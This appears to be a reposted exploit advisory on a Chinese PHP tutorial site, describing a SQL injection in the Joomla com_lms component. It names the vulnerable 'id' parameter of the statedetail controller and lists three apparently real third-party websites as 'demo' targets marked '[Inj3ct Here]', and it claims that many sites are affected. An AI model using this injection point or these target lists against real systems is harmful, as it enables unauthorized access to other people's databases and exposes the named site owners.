来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 作者: KinG Of PiraTeS类型:: webapps平台: php开发者:http://www.joomlalms.com/下载地址http://extensions.joomla.org/影响版本: All vErsion测试系统: [Windows 7 Edition Inteacute;grale 64b......
作者: KinG Of PiraTeS 类型 :: webapps 平台: php 开发者: http://www.joomlalms.com/ 下载地址 http://extensions.joomla.org/ < 影响版本: All vErsion 测试系统: [Windows 7 Edition Intégrale 64bit ] # 1)介绍2)缺陷描述3)利用方法>> ---------------------------------------------------------------- 1)Introduction ============== 2)Vulnerability Description =========================== U can inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else. 3)Exploit ========= http://www.2cto.com /{Path}/index.php?option=com_lms&controller=statedetail&id=-1 [~] P0c [~] : ============ Vuln file in : http://Localhost/{Path}/index.php?option=com_lms&controller=statedetail&id=[Number] <<-----| [~] D3m0 [~] : ============= http://php.esoftech.org/kanerma/index.php?option=com_lms&controller=statedetail&id=1[Inj3ct Here] http://www.senmedical.com/index.php?option=com_lms&controller=statedetail&id=1[Inj3ct Here] http://www.najbaro.com/index.php?option=com_lms&controller=statedetail&id=1[Inj3ct Here] Many Websites are Affected On SQL inJection & Path désclosure . . . #### Peace From Algeria
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
